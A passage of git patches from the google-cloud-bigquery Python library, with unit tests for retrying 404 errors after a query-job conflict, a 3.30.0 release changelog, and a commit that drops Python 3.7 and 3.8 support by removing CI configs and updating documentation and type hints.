only going to be + # jobs.get requests and responses. + google.api_core.exceptions.TooManyRequests("this is retriable by default"), + google.api_core.exceptions.NotFound("we lost your job"), + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": self.PROJECT, + "location": "TESTLOC", + "jobId": job_id, + } + }, + ) + + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + return_value=job_id, + ) + + with job_begin_patcher, job_id_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path = mock.call( + method="GET", + path=f"/projects/{self.PROJECT}/jobs/{job_id}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path] + * 4, + ) + assert result.job_id == job_id + + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404_and_query_job_insert( + self, + ): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404. If it keeps + failing with a 404, assume that the job actually doesn't exist. + """ + job_id_1 = "abc123" + job_id_2 = "xyz789" + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + + # We're mocking QueryJob._begin, so that the connection should only get + # jobs.get requests. + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + conn = client._connection = make_connection( + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": self.PROJECT, + "location": "TESTLOC", + "jobId": job_id_2, + } + }, + ) + + # Choose a small deadline so the 404 retries give up. + retry = ( + google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY.with_deadline(1) + ) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + side_effect=[job_id_1, job_id_2], + ) + retry_patcher = mock.patch.object( + google.cloud.bigquery.retry, + "_DEFAULT_GET_JOB_CONFLICT_RETRY", + retry, + ) + + with freezegun.freeze_time( + "2025-01-01 00:00:00", + # 10x the retry deadline to guarantee a timeout. + auto_tick_seconds=10, + ), job_begin_patcher, job_id_patcher, retry_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path_1 = mock.call( + method="GET", + path=f"/projects/{self.PROJECT}/jobs/{job_id_1}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + jobs_get_path_2 = mock.call( + method="GET", + path=f"/projects/{self.PROJECT}/jobs/{job_id_2}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path_1, jobs_get_path_2], + ) + assert result.job_id == job_id_2 + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_succeeds(self): from google.api_core.exceptions import Conflict from google.cloud.bigquery.job import QueryJob From 3a1e3f3378f370986298b9bca652fdf2b5d9d14e Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 27 Feb 2025 10:42:38 -0800 Subject: [PATCH 069/202] chore(main): release 3.30.0 (#2119) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 26 ++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 27 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 45c39e19c..91d0a362d 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,32 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.30.0](https://github.com/googleapis/python-bigquery/compare/v3.29.0...v3.30.0) (2025-02-26) + + +### Features + +* Add roundingmode enum, wiring, and tests ([#2121](https://github.com/googleapis/python-bigquery/issues/2121)) ([3a48948](https://github.com/googleapis/python-bigquery/commit/3a4894827f6e73a4a88cb22933c2004697dabcc7)) +* Adds foreign_type_info attribute to table class and adds unit tests. ([#2126](https://github.com/googleapis/python-bigquery/issues/2126)) ([2c19681](https://github.com/googleapis/python-bigquery/commit/2c1968115bef8e1dc84e0125615f551b9b011a4b)) +* Support resource_tags for table ([#2093](https://github.com/googleapis/python-bigquery/issues/2093)) ([d4070ca](https://github.com/googleapis/python-bigquery/commit/d4070ca21b5797e900a9e87b966837ee1c278217)) + + +### Bug Fixes + +* Avoid blocking in download thread when using BQ Storage API ([#2034](https://github.com/googleapis/python-bigquery/issues/2034)) ([54c8d07](https://github.com/googleapis/python-bigquery/commit/54c8d07f06a8ae460c9e0fb1614e1fbc21efb5df)) +* Retry 404 errors in `Client.query(...)` ([#2135](https://github.com/googleapis/python-bigquery/issues/2135)) ([c6d5f8a](https://github.com/googleapis/python-bigquery/commit/c6d5f8aaec21ab8f17436407aded4bc2316323fd)) + + +### Dependencies + +* Updates required checks list in github ([#2136](https://github.com/googleapis/python-bigquery/issues/2136)) ([fea49ff](https://github.com/googleapis/python-bigquery/commit/fea49ffbf8aa1d53451864ceb7fd73189b6661cb)) +* Use pandas-gbq to determine schema in `load_table_from_dataframe` ([#2095](https://github.com/googleapis/python-bigquery/issues/2095)) ([7603bd7](https://github.com/googleapis/python-bigquery/commit/7603bd71d60592ef2a551d9eea09987b218edc73)) + + +### Documentation + +* Update magics.rst ([#2125](https://github.com/googleapis/python-bigquery/issues/2125)) ([b5bcfb3](https://github.com/googleapis/python-bigquery/commit/b5bcfb303d27015b747a3b0747ecd7f7ed0ed557)) + ## [3.29.0](https://github.com/googleapis/python-bigquery/compare/v3.28.0...v3.29.0) (2025-01-21) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 3d852b8a3..01c4c51ca 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.29.0" +__version__ = "3.30.0" From fb7de398cb2ad000b80a8a702d1f6539dc03d8e0 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 28 Feb 2025 13:14:05 -0500 Subject: [PATCH 070/202] deps: Remove Python 3.7 and 3.8 as supported runtimes (#2133) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Initial batch of changes to remove 3.7 and 3.8 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * more updates to remove 3.7 and 3.8 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates samples/geography/reqs * updates samples/magics/reqs * updates samples/notebooks/reqs * updates linting * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates conf due to linting issue * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates reqs.txt, fix mypy, lint, and debug in noxfile * Updates owlbot to correct spacing issue in conf.py * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates owlbot imports * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * removes kokoro samples configs for 3.7 & 3.8 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * removes owlbots attempt to restore kokoro samples configs * removes kokoro system-3.8.cfg * edits repo sync settings * updates assorted noxfiles for samples and pyproject.toml * update test-samples-impl.sh * updates install_deps template * Edits to the contributing documentation * deps: use pandas-gbq to determine schema in `load_table_from_dataframe` (#2095) * feat: use pandas-gbq to determine schema in `load_table_from_dataframe` * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * fix some unit tests * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * bump minimum pandas-gbq to 0.26.1 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * drop pandas-gbq from python 3.7 extras * relax warning message text assertion * use consistent time zone presense/absense in time datetime system test * Update google/cloud/bigquery/_pandas_helpers.py * Update google/cloud/bigquery/_pandas_helpers.py Co-authored-by: Chalmer Lowe * remove pandas-gbq from at least 1 unit test and system test session --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe * Feat: Adds foreign_type_info attribute to table class and adds unit tests. (#2126) * adds foreign_type_info attribute to table * feat: Adds foreign_type_info attribute and tests * updates docstrings for foreign_type_info * Updates property handling, especially as regards set/get_sub_prop * Removes extraneous comments and debug expressions * Refactors build_resource_from_properties w get/set_sub_prop * updates to foreign_type_info, tests and wiring * Adds logic to detect non-Sequence schema.fields value * updates assorted tests and logic * deps: updates required checks list in github (#2136) * deps: updates required checks list in github * deps: updates snippet and system checks in github to remove 3.9 * changes the order of two items in the list. * updates linting * reverts pandas back to 1.1.0 * Revert changes related to pandas <1.5 * Revert noxfile.py changes related to pandas <1.5 * Revert constraints-3.9 changes related to pandas <1.5 * Revert test_query_pandas.py changes related to pandas <1.5 * Revert test__pandas_helpers.py changes related to pandas <1.5 * Revert test__versions_helpers.py changes related to pandas <1.5 * Revert tnoxfile.py changes related to pandas <1.5 * Revert test__versions_helpers.py changes related to pandas <1.5 * Revert test_table.py changes related to pandas <1.5 * Update noxfile changes related to pandas <1.5 * Update pyproject.toml changes related to pandas <1.5 * Update constraints-3.9.txt changes related to pandas <1.5 * Update test_legacy_types.py changes related to pandas <1.5 * Updates magics.py as part of reverting from pandas 1.5 * Updates noxfile.py in reverting from pandas 1.5 * Updates pyproject.toml in reverting from pandas 1.5 * Updates constraints.txt in reverting from pandas 1.5 * Updates test_magics in reverting from pandas 1.5 * Updates test_table in reverting from pandas 1.5 * Updates in tests re: reverting from pandas 1.5 * Updates pyproject to match constraints.txt * updates pyproject.toml to mirror constraints * remove limit on virtualenv * updates owlbot.py for test-samples-impl.sh * updates to owlbot.py * updates to test-samples-impl.sh * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * further updates to owlbot.py * removes unneeded files * adds presubmit.cfg back in --------- Co-authored-by: Owl Bot Co-authored-by: Tim SweΓ±a (Swast) --- .coveragerc | 2 +- .../{snippets-3.8.cfg => snippets-3.9.cfg} | 2 +- .../{system-3.8.cfg => system-3.9.cfg} | 4 +- .kokoro/samples/python3.7/common.cfg | 40 ----------- .kokoro/samples/python3.7/continuous.cfg | 6 -- .kokoro/samples/python3.7/periodic-head.cfg | 11 ---- .kokoro/samples/python3.7/periodic.cfg | 6 -- .kokoro/samples/python3.7/presubmit.cfg | 6 -- .kokoro/samples/python3.8/common.cfg | 40 ----------- .kokoro/samples/python3.8/continuous.cfg | 6 -- .kokoro/samples/python3.8/periodic-head.cfg | 11 ---- .kokoro/samples/python3.8/periodic.cfg | 6 -- .kokoro/samples/python3.8/presubmit.cfg | 6 -- .kokoro/test-samples-impl.sh | 3 +- CONTRIBUTING.rst | 15 ++--- README.rst | 4 +- google/cloud/bigquery/__init__.py | 6 +- google/cloud/bigquery/_pandas_helpers.py | 9 ++- google/cloud/bigquery/_pyarrow_helpers.py | 14 ++-- google/cloud/bigquery/external_config.py | 6 +- google/cloud/bigquery/format_options.py | 4 +- google/cloud/bigquery/job/base.py | 4 +- google/cloud/bigquery/magics/magics.py | 1 - google/cloud/bigquery/model.py | 2 +- google/cloud/bigquery/routine/routine.py | 16 +++-- google/cloud/bigquery/schema.py | 6 +- google/cloud/bigquery/table.py | 14 ++-- noxfile.py | 43 ++++++++---- owlbot.py | 66 ++++++++++++++++++- pyproject.toml | 21 +++--- samples/desktopapp/noxfile.py | 4 +- samples/desktopapp/requirements-test.txt | 3 +- samples/desktopapp/user_credentials_test.py | 9 +-- samples/geography/noxfile.py | 4 +- samples/geography/requirements-test.txt | 3 +- samples/geography/requirements.txt | 56 +++++----------- samples/magics/conftest.py | 6 +- samples/magics/noxfile.py | 4 +- samples/magics/requirements-test.txt | 3 +- samples/magics/requirements.txt | 8 +-- samples/notebooks/jupyter_tutorial_test.py | 4 +- samples/notebooks/noxfile.py | 4 +- samples/notebooks/requirements-test.txt | 3 +- samples/notebooks/requirements.txt | 10 +-- samples/snippets/noxfile.py | 4 +- samples/snippets/requirements-test.txt | 3 +- .../templates/install_deps.tmpl.rst | 2 +- testing/constraints-3.7.txt | 36 ---------- testing/constraints-3.8.txt | 11 ---- testing/constraints-3.9.txt | 26 +++++++- tests/system/test_pandas.py | 7 +- tests/unit/job/test_copy.py | 1 - tests/unit/job/test_query_pandas.py | 2 + tests/unit/test__pandas_helpers.py | 5 +- tests/unit/test__versions_helpers.py | 9 ++- tests/unit/test_legacy_types.py | 4 +- tests/unit/test_magics.py | 1 + tests/unit/test_table.py | 27 ++++---- tests/unit/test_table_pandas.py | 12 ++-- 59 files changed, 274 insertions(+), 377 deletions(-) rename .kokoro/presubmit/{snippets-3.8.cfg => snippets-3.9.cfg} (82%) rename .kokoro/presubmit/{system-3.8.cfg => system-3.9.cfg} (81%) delete mode 100644 .kokoro/samples/python3.7/common.cfg delete mode 100644 .kokoro/samples/python3.7/continuous.cfg delete mode 100644 .kokoro/samples/python3.7/periodic-head.cfg delete mode 100644 .kokoro/samples/python3.7/periodic.cfg delete mode 100644 .kokoro/samples/python3.7/presubmit.cfg delete mode 100644 .kokoro/samples/python3.8/common.cfg delete mode 100644 .kokoro/samples/python3.8/continuous.cfg delete mode 100644 .kokoro/samples/python3.8/periodic-head.cfg delete mode 100644 .kokoro/samples/python3.8/periodic.cfg delete mode 100644 .kokoro/samples/python3.8/presubmit.cfg delete mode 100644 testing/constraints-3.7.txt delete mode 100644 testing/constraints-3.8.txt diff --git a/.coveragerc b/.coveragerc index 04092257a..e78e7a931 100644 --- a/.coveragerc +++ b/.coveragerc @@ -9,6 +9,6 @@ omit = google/cloud/bigquery_v2/* # Legacy proto-based types. exclude_lines = # Re-enable the standard pragma - pragma: NO COVER + pragma: (no cover|NO COVER) # Ignore debug-only repr def __repr__ diff --git a/.kokoro/presubmit/snippets-3.8.cfg b/.kokoro/presubmit/snippets-3.9.cfg similarity index 82% rename from .kokoro/presubmit/snippets-3.8.cfg rename to .kokoro/presubmit/snippets-3.9.cfg index 840d9e716..d1de209a2 100644 --- a/.kokoro/presubmit/snippets-3.8.cfg +++ b/.kokoro/presubmit/snippets-3.9.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "snippets-3.8" + value: "snippets-3.9" } diff --git a/.kokoro/presubmit/system-3.8.cfg b/.kokoro/presubmit/system-3.9.cfg similarity index 81% rename from .kokoro/presubmit/system-3.8.cfg rename to .kokoro/presubmit/system-3.9.cfg index f4bcee3db..bd1fb514b 100644 --- a/.kokoro/presubmit/system-3.8.cfg +++ b/.kokoro/presubmit/system-3.9.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "system-3.8" -} \ No newline at end of file + value: "system-3.9" +} diff --git a/.kokoro/samples/python3.7/common.cfg b/.kokoro/samples/python3.7/common.cfg deleted file mode 100644 index d30dc6018..000000000 --- a/.kokoro/samples/python3.7/common.cfg +++ /dev/null @@ -1,40 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Specify which tests to run -env_vars: { - key: "RUN_TESTS_SESSION" - value: "py-3.7" -} - -# Declare build specific Cloud project. -env_vars: { - key: "BUILD_SPECIFIC_GCLOUD_PROJECT" - value: "python-docs-samples-tests-py37" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples.sh" -} - -# Configure the docker image for kokoro-trampoline. -env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" -} - -# Download secrets for samples -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline_v2.sh" \ No newline at end of file diff --git a/.kokoro/samples/python3.7/continuous.cfg b/.kokoro/samples/python3.7/continuous.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.7/continuous.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/samples/python3.7/periodic-head.cfg b/.kokoro/samples/python3.7/periodic-head.cfg deleted file mode 100644 index 5aa01bab5..000000000 --- a/.kokoro/samples/python3.7/periodic-head.cfg +++ /dev/null @@ -1,11 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" -} diff --git a/.kokoro/samples/python3.7/periodic.cfg b/.kokoro/samples/python3.7/periodic.cfg deleted file mode 100644 index 71cd1e597..000000000 --- a/.kokoro/samples/python3.7/periodic.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "False" -} diff --git a/.kokoro/samples/python3.7/presubmit.cfg b/.kokoro/samples/python3.7/presubmit.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.7/presubmit.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/samples/python3.8/common.cfg b/.kokoro/samples/python3.8/common.cfg deleted file mode 100644 index 46759c6d6..000000000 --- a/.kokoro/samples/python3.8/common.cfg +++ /dev/null @@ -1,40 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Specify which tests to run -env_vars: { - key: "RUN_TESTS_SESSION" - value: "py-3.8" -} - -# Declare build specific Cloud project. -env_vars: { - key: "BUILD_SPECIFIC_GCLOUD_PROJECT" - value: "python-docs-samples-tests-py38" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples.sh" -} - -# Configure the docker image for kokoro-trampoline. -env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" -} - -# Download secrets for samples -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline_v2.sh" \ No newline at end of file diff --git a/.kokoro/samples/python3.8/continuous.cfg b/.kokoro/samples/python3.8/continuous.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.8/continuous.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/samples/python3.8/periodic-head.cfg b/.kokoro/samples/python3.8/periodic-head.cfg deleted file mode 100644 index 5aa01bab5..000000000 --- a/.kokoro/samples/python3.8/periodic-head.cfg +++ /dev/null @@ -1,11 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" -} diff --git a/.kokoro/samples/python3.8/periodic.cfg b/.kokoro/samples/python3.8/periodic.cfg deleted file mode 100644 index 71cd1e597..000000000 --- a/.kokoro/samples/python3.8/periodic.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "False" -} diff --git a/.kokoro/samples/python3.8/presubmit.cfg b/.kokoro/samples/python3.8/presubmit.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.8/presubmit.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/test-samples-impl.sh b/.kokoro/test-samples-impl.sh index 53e365bc4..40e248822 100755 --- a/.kokoro/test-samples-impl.sh +++ b/.kokoro/test-samples-impl.sh @@ -33,8 +33,7 @@ export PYTHONUNBUFFERED=1 env | grep KOKORO # Install nox -# `virtualenv==20.26.6` is added for Python 3.7 compatibility -python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6 +python3.9 -m pip install --upgrade --quiet nox virtualenv # Use secrets acessor service account to get secrets if [[ -f "${KOKORO_GFILE_DIR}/secrets_viewer_service_account.json" ]]; then diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index 1900c5e36..8f4d54bce 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -22,7 +22,7 @@ In order to add a feature: documentation. - The feature must work fully on the following CPython versions: - 3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. + 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. - The feature must not add unnecessary dependencies (where "unnecessary" is of course subjective, but new dependencies should @@ -143,13 +143,12 @@ Running System Tests $ nox -s system # Run a single system test - $ nox -s system-3.8 -- -k + $ nox -s system-3.9 -- -k .. note:: - System tests are only configured to run under Python 3.8. - For expediency, we do not run them in older versions of Python 3. + System tests are configured to run under Python 3.9, 3.11, 3.12. This alone will not run the tests. You'll need to change some local auth settings and change some configuration in your project to @@ -195,11 +194,11 @@ configure them just like the System Tests. # Run all tests in a folder $ cd samples/snippets - $ nox -s py-3.8 + $ nox -s py-3.9 # Run a single sample test $ cd samples/snippets - $ nox -s py-3.8 -- -k + $ nox -s py-3.9 -- -k ******************************************** Note About ``README`` as it pertains to PyPI @@ -221,16 +220,12 @@ Supported Python Versions We support: -- `Python 3.7`_ -- `Python 3.8`_ - `Python 3.9`_ - `Python 3.10`_ - `Python 3.11`_ - `Python 3.12`_ - `Python 3.13`_ -.. _Python 3.7: https://docs.python.org/3.7/ -.. _Python 3.8: https://docs.python.org/3.8/ .. _Python 3.9: https://docs.python.org/3.9/ .. _Python 3.10: https://docs.python.org/3.10/ .. _Python 3.11: https://docs.python.org/3.11/ diff --git a/README.rst b/README.rst index f81adc4b9..29e15e067 100644 --- a/README.rst +++ b/README.rst @@ -52,11 +52,11 @@ dependencies. Supported Python Versions ^^^^^^^^^^^^^^^^^^^^^^^^^ -Python >= 3.7 +Python >= 3.9 Unsupported Python Versions ^^^^^^^^^^^^^^^^^^^^^^^^^^^ -Python == 2.7, Python == 3.5, Python == 3.6. +Python == 2.7, Python == 3.5, Python == 3.6, Python == 3.7, and Python == 3.8. The last version of this library compatible with Python 2.7 and 3.5 is `google-cloud-bigquery==1.28.0`. diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index caf75333a..d39c71641 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -126,12 +126,12 @@ if sys_major == 3 and sys_minor in (7, 8): warnings.warn( - "The python-bigquery library will stop supporting Python 3.7 " - "and Python 3.8 in a future major release expected in Q4 2024. " + "The python-bigquery library no longer supports Python 3.7 " + "and Python 3.8. " f"Your Python version is {sys_major}.{sys_minor}.{sys_micro}. We " "recommend that you update soon to ensure ongoing support. For " "more details, see: [Google Cloud Client Libraries Supported Python Versions policy](https://cloud.google.com/python/docs/supported-python-versions)", - PendingDeprecationWarning, + FutureWarning, ) __all__ = [ diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 0017d92ce..feb6b3adb 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -336,8 +336,13 @@ def types_mapper(arrow_data_type): ): return range_date_dtype - elif range_timestamp_dtype is not None and arrow_data_type.equals( - range_timestamp_dtype.pyarrow_dtype + # TODO: this section does not have a test yet OR at least not one that is + # recognized by coverage, hence the pragma. See Issue: #2132 + elif ( + range_timestamp_dtype is not None + and arrow_data_type.equals( # pragma: NO COVER + range_timestamp_dtype.pyarrow_dtype + ) ): return range_timestamp_dtype diff --git a/google/cloud/bigquery/_pyarrow_helpers.py b/google/cloud/bigquery/_pyarrow_helpers.py index 1b42cd5c7..034e020ee 100644 --- a/google/cloud/bigquery/_pyarrow_helpers.py +++ b/google/cloud/bigquery/_pyarrow_helpers.py @@ -21,8 +21,6 @@ from typing import Any -from packaging import version - try: import pyarrow # type: ignore except ImportError: @@ -101,14 +99,10 @@ def pyarrow_timestamp(): pyarrow.decimal128(38, scale=9).id: "NUMERIC", } - # Adds bignumeric support only if pyarrow version >= 3.0.0 - # Decimal256 support was added to arrow 3.0.0 - # https://arrow.apache.org/blog/2021/01/25/3.0.0-release/ - if version.parse(pyarrow.__version__) >= version.parse("3.0.0"): - _BQ_TO_ARROW_SCALARS["BIGNUMERIC"] = pyarrow_bignumeric - # The exact decimal's scale and precision are not important, as only - # the type ID matters, and it's the same for all decimal256 instances. - _ARROW_SCALAR_IDS_TO_BQ[pyarrow.decimal256(76, scale=38).id] = "BIGNUMERIC" + _BQ_TO_ARROW_SCALARS["BIGNUMERIC"] = pyarrow_bignumeric + # The exact decimal's scale and precision are not important, as only + # the type ID matters, and it's the same for all decimal256 instances. + _ARROW_SCALAR_IDS_TO_BQ[pyarrow.decimal256(76, scale=38).id] = "BIGNUMERIC" def bq_to_arrow_scalars(bq_scalar: str): diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 73c4acabf..6e943adf3 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -835,8 +835,10 @@ def schema(self): See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.schema """ - prop = self._properties.get("schema", {}) - return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + prop = self._properties.get("schema", {}) # type: ignore + return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] # type: ignore @schema.setter def schema(self, value): diff --git a/google/cloud/bigquery/format_options.py b/google/cloud/bigquery/format_options.py index ad5591b1c..e26b7a74f 100644 --- a/google/cloud/bigquery/format_options.py +++ b/google/cloud/bigquery/format_options.py @@ -13,7 +13,7 @@ # limitations under the License. import copy -from typing import Dict, Optional +from typing import Dict, Optional, Union class AvroOptions: @@ -106,7 +106,7 @@ def enable_list_inference(self, value: bool) -> None: self._properties["enableListInference"] = value @property - def map_target_type(self) -> str: + def map_target_type(self) -> Optional[Union[bool, str]]: """Indicates whether to simplify the representation of parquet maps to only show keys and values.""" return self._properties.get("mapTargetType") diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index e5f68c843..eaa9d3460 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -415,7 +415,9 @@ def __init__(self, job_id, client): @property def configuration(self) -> _JobConfig: """Job-type specific configurtion.""" - configuration = self._CONFIG_CLASS() + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + configuration = self._CONFIG_CLASS() # pytype: disable=not-callable configuration._properties = self._properties.setdefault("configuration", {}) return configuration diff --git a/google/cloud/bigquery/magics/magics.py b/google/cloud/bigquery/magics/magics.py index a5be95185..1f892b595 100644 --- a/google/cloud/bigquery/magics/magics.py +++ b/google/cloud/bigquery/magics/magics.py @@ -55,7 +55,6 @@ except ImportError: bigquery_magics = None - IPYTHON_USER_AGENT = "ipython-{}".format(IPython.__version__) # type: ignore diff --git a/google/cloud/bigquery/model.py b/google/cloud/bigquery/model.py index 45a88ab22..16581be5a 100644 --- a/google/cloud/bigquery/model.py +++ b/google/cloud/bigquery/model.py @@ -58,7 +58,7 @@ def __init__(self, model_ref: 